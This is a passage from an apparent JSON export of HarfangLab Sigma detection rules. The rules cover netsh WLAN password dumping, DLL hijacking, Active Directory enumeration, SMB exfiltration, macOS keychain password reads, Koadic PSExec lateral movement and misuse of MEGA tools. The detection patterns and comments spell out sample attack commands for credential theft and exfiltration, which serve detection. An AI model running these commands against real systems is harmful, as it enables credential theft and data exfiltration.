"content": "title: Wireless Passwords Dumped via netsh\nid: 4538136c-2f3b-423b-ab28-46ea322d43a4\ndescription: |\n Detects the dumping of wireless interface passwords using the netsh utility.\n Wireless passwords can be dumped using the \"netsh wlan\" command.\n Threat actors can use this to harvest WLAN passwords to ease further compromise from a wireless network.\n Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.\n It is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\nreferences:\n - https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary\n - https://attack.mitre.org/techniques/T1003/\n - https://attack.mitre.org/techniques/T1016/002/\ndate: 2020/09/30\nmodified: 2025/05/09\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1016\n - attack.t1016.002\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n\n selection_keys:\n CommandLine|contains:\n - 'wlan*show*key=clear'\n - 'wlan*export*key=clear'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n # NinjaRMMAgent\n exclusion_ninjarmm:\n GrandparentImage: '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n\n exclusion_cyberwatch:\n GrandparentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_eclipse:\n ParentImage: '?:\\Program Files\\Java\\jdk-*\\bin\\javaw.exe'\n GrandparentImage|endswith: '\\eclipse.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4538136c-2f3b-423b-ab28-46ea322d43a4",
"rule_name": "Wireless Passwords Dumped via netsh",
"rule_description": "Detects the dumping of wireless interface passwords using the netsh utility.\nWireless passwords can be dumped using the \"netsh wlan\" command.\nThreat actors can use this to harvest WLAN passwords to ease further compromise from a wireless network.\nAdversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.\nIt is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\n",
"rule_creation_date": "2020-09-30",
"rule_modified_date": "2025-05-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1016",
"attack.t1016.002",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "453ec392-74ba-49e5-9ed5-2fc7a3c52b71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592738Z",
"creation_date": "2026-03-23T11:45:34.592741Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/",
"https://twitter.com/Sh0ckFR/status/1554021948967079936",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nissrv.yml",
"content": "title: DLL Hijacking via NisSrv.exe\nid: 453ec392-74ba-49e5-9ed5-2fc7a3c52b71\ndescription: |\n Detects potential Windows DLL Hijacking via NisSrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers can use the legitimate and signed NisSrv.exe to load a malicious DLL named mpclient.dll planted in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/\n - https://twitter.com/Sh0ckFR/status/1554021948967079936\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/02\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NisSrv.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\mpclient.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "453ec392-74ba-49e5-9ed5-2fc7a3c52b71",
"rule_name": "DLL Hijacking via NisSrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NisSrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers can use the legitimate and signed NisSrv.exe to load a malicious DLL named mpclient.dll planted in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-02",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4541ab75-2acf-47ff-bcc2-c8ac479ee8c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604936Z",
"creation_date": "2026-03-23T11:45:34.604940Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604947Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1087_002_domain_account_discovered_powershell.yml",
"content": "title: Domain Account Discovered via PowerShell\nid: 4541ab75-2acf-47ff-bcc2-c8ac479ee8c7\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory user accounts.\n This may be used for reconnaissance to identify privileged or service accounts.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=user'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4541ab75-2acf-47ff-bcc2-c8ac479ee8c7",
"rule_name": "Domain Account Discovered via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate Active Directory user accounts.\nThis may be used for reconnaissance to identify privileged or service accounts.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "454ab28f-f8cd-420f-8c76-62220807a066",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073349Z",
"creation_date": "2026-03-23T11:45:34.073351Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073355Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1571145275649191936",
"https://attack.mitre.org/techniques/T1048/003/"
],
"name": "t1048_003_powershell_exfiltration_over_smb.yml",
"content": "title: Data Possibly Exfiltrated via PowerShell over SMB\nid: 454ab28f-f8cd-420f-8c76-62220807a066\ndescription: |\n Detects suspicious file copies using PowerShell over SMB.\n Attackers can use this technique as SMB traffic is often allowed on networks and PowerShell usage allows a Living-off-the-Land approach.\n It is recommended to investigate the PowerShell script, the copied files as well as the PowerShell process ancestors to determine the legitimacy of this action.\nreferences:\n - https://twitter.com/malmoeb/status/1571145275649191936\n - https://attack.mitre.org/techniques/T1048/003/\ndate: 2022/09/27\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n # Copy-Item -Path \"C:\\Exfiltration\" -Destination \"\\\\10.2.124.12\\admin$\" -Recurse\n # Copy-Item -Path \"\\\\10.2.124.12\\C$\\Windows\\temp\\a.exe\" -Destination \"$Env:TEMP\\a.exe\"\n PowershellCommand|re:\n - '(?i)Copy-Item -P[ath]{0,3} [[:print:]]+ -D[estination]{0,10} [[:print:]]{0,1}\\\\\\\\([0-9]{1,3}\\.){3}([0-9]{1,3})\\\\(c\\$|admin\\$)'\n - '(?i)Copy-Item -P[ath]{0,3} [[:print:]]{0,1}\\\\\\\\([0-9]{1,3}\\.){3}([0-9]{1,3})\\\\(c\\$|admin\\$)[[:print:]]+ -D[estination]{0,10} '\n\n condition: selection\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "454ab28f-f8cd-420f-8c76-62220807a066",
"rule_name": "Data Possibly Exfiltrated via PowerShell over SMB",
"rule_description": "Detects suspicious file copies using PowerShell over SMB.\nAttackers can use this technique as SMB traffic is often allowed on networks and PowerShell usage allows a Living-off-the-Land approach.\nIt is recommended to investigate the PowerShell script, the copied files as well as the PowerShell process ancestors to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-09-27",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45922484-daf1-46c5-b3fb-d9357d117e41",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626287Z",
"creation_date": "2026-03-23T11:45:34.626289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626293Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/",
"https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/",
"https://www.trendmicro.com/en_se/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html",
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1564_001_security_password_listed.yml",
"content": "title: Password Discovered from Keychain via security\nid: 45922484-daf1-46c5-b3fb-d9357d117e41\ndescription: |\n Detects the usage of the security binary to gather passwords stored in keychain files.\n Adversaries may access keychain files in order to gather sensitive information such as passwords.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/\n - https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/\n - https://www.trendmicro.com/en_se/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2024/06/18\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName: 'security'\n CommandLine|contains: 'find-generic-password'\n Ancestors|contains:\n # folder\n - '/Volumes/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/var/folder/'\n - '/private/etc/'\n - '/Users/'\n - '/private/var/root'\n # binary\n - 'osascript'\n - 'python'\n\n exclusion_zsh:\n ParentImage: '/Users/*/.local/bin/zsh (qterm)'\n\n exclusion_copilot:\n ProcessGrandparentImage: '/Users/*/.local/share/gh/extensions/gh-copilot/gh-copilot'\n\n exclusion_appuninstaller:\n ProcessParentImage: '/Users/*/Library/Application Support/Setapp/LaunchAgents/Setapp.app/Contents/Resources/SetappUninstaller.app/Contents/MacOS/SetappUninstaller'\n\n exclusion_node:\n ProcessParentCommandLine|startswith: 'node /Users/*/.nvm/versions/node/v*/bin/appcenter codepush release-react '\n\n exclusion_amazonq:\n ProcessParentImage:\n - '/private/var/folders/*/Amazon Q.app/Contents/MacOS/q'\n - '/Applications/Amazon Q.app/Contents/MacOS/q'\n ProcessCommandLine|contains: '/usr/bin/security find-generic-password -s codewhisperer:'\n\n exclusion_homebrew:\n Ancestors|contains: '/opt/homebrew/'\n\n exclusion_interactive:\n Ancestors|startswith:\n - '/bin/zsh|/usr/bin/login|'\n - '/bin/bash|/bin/zsh|/usr/bin/login|'\n - '/bin/zsh|/bin/zsh|/usr/bin/login|'\n - '/Users/*/.local/bin/zsh (kiro-cli-term)|/usr/bin/login|'\n - '/Applications/Kiro CLI.app/Contents/MacOS/kiro-cli|/bin/zsh|/Users/*/.local/bin/zsh (kiro-cli-term)|/usr/bin/login|'\n\n exclusion_claude:\n CommandLine:\n - 'security find-generic-password -a * -w -s Claude Code'\n - 'security find-generic-password -a * -w -s Claude Code-credentials'\n\n exclusion_publisher:\n CommandLine: '/usr/bin/security find-generic-password -s Posit Publisher Safe Storage -wa credentials'\n ProcessParentImage|endswith: '/bin/publisher'\n\n exclusion_salesforce:\n CommandLine: '/usr/bin/security find-generic-password -a local -s sfdx -g'\n\n exclusion_cursor:\n CommandLine:\n - '/usr/bin/security find-generic-password -a cursor-user -s cursor-refresh-token -g'\n - '/usr/bin/security find-generic-password -a cursor-user -s cursor-access-token -g'\n - '/usr/bin/security find-generic-password -a cursor-user -s cursor-api-key -g'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45922484-daf1-46c5-b3fb-d9357d117e41",
"rule_name": "Password Discovered from Keychain via security",
"rule_description": "Detects the usage of the security binary to gather passwords stored in keychain files.\nAdversaries may access keychain files in order to gather sensitive information such as passwords.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-01-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45caf93e-1781-482c-860b-80988fbec6b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073265Z",
"creation_date": "2026-03-23T11:45:34.073267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073271Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0250/",
"https://attack.mitre.org/software/S0029/"
],
"name": "t1569_002_koadic_psexec.yml",
"content": "title: PSExec Executed via Koadic\nid: 45caf93e-1781-482c-860b-80988fbec6b4\ndescription: |\n Detects the execution of PSExec from the Sysinternals website as used per the HackTool Koadic.\n Koadic uses PSExec to execute arbitrary commands on remote systems and move laterally.\n It is recommended to check for suspicious activities by the process' parents and on the target system.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/software/S0029/\ndate: 2021/02/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1569.002\n - attack.s0250\n - attack.s0029\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Koadic\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\system32\\cmd.exe /q /c \\\\live.sysinternals.com@SSL\\tools\\\\psexec.exe \\\\192.168.56.105 -u \"tata\\user\" -p user -accepteula hostname\n selection_bin:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.EXE'\n\n selection_cmd1:\n CommandLine|contains|all:\n - ' /q '\n - ' /c '\n - ' -accepteula '\n\n selection_cmd2:\n CommandLine|contains:\n - ' ??live.sysinternals.com@SSL\\tools??psexec.exe '\n - ' ??live.sysinternals.com\\tools??psexec.exe '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45caf93e-1781-482c-860b-80988fbec6b4",
"rule_name": "PSExec Executed via Koadic",
"rule_description": "Detects the execution of PSExec fetched directly from the Sysinternals website, as used by the Koadic hack tool.\nKoadic uses PSExec to execute arbitrary commands on remote systems and move laterally.\nIt is recommended to check for suspicious activities by the process' parents and on the target system.\n",
"rule_creation_date": "2021-02-22",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45f5a596-6369-4f07-8000-7282b8fedc62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610578Z",
"creation_date": "2026-03-23T11:45:34.610582Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610589Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/rclone-mega-extortion/",
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://attack.mitre.org/techniques/T1567/002/"
],
"name": "t1567_002_suspicious_megasync.yml",
"content": "title: Suspicious MEGA tools Execution\nid: 45f5a596-6369-4f07-8000-7282b8fedc62\ndescription: |\n Detects the execution of renamed MEGA tools or located in an abnormal path.\n Attackers may use a MEGA tool in order to exfiltrate data from a compromised network.\n It is recommended to check that the use of this tool is legitimate.\nreferences:\n - https://redcanary.com/blog/rclone-mega-extortion/\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://attack.mitre.org/techniques/T1567/002/\ndate: 2021/09/30\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Mega\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName:\n - 'MEGAsync.exe'\n - 'MEGAclient.exe'\n - 'MEGAcmd.exe'\n - 'MEGAcmdShell.exe'\n - 'MEGAcmdServer.exe'\n - 'MEGAcmdUpdater.exe'\n\n filter_legit_folder:\n Image:\n - '?:\\Users\\\\*\\AppData\\Local\\MEGAsync\\MEGAsync.exe'\n - '?:\\ProgramData\\MEGAsync\\MEGAsync.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\MEGAcmd\\\\*'\n - '?:\\ProgramData\\MEGAcmd\\\\*'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45f5a596-6369-4f07-8000-7282b8fedc62",
"rule_name": "Suspicious MEGA tools Execution",
"rule_description": "Detects the execution of MEGA tools that have been renamed or that are located in an abnormal path.\nAttackers may use a MEGA tool in order to exfiltrate data from a compromised network.\nIt is recommended to check that the use of this tool is legitimate.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45fe4a7d-bc95-4fd4-83e4-803986c6010f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099219Z",
"creation_date": "2026-03-23T11:45:34.099221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099225Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_devicecredentialdeployment.yml",
"content": "title: DLL Hijacking via devicecredentialdeployment.exe\nid: 45fe4a7d-bc95-4fd4-83e4-803986c6010f\ndescription: |\n Detects potential Windows DLL Hijacking via devicecredentialdeployment.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'devicecredentialdeployment.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DeviceCredential.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45fe4a7d-bc95-4fd4-83e4-803986c6010f",
"rule_name": "DLL Hijacking via devicecredentialdeployment.exe",
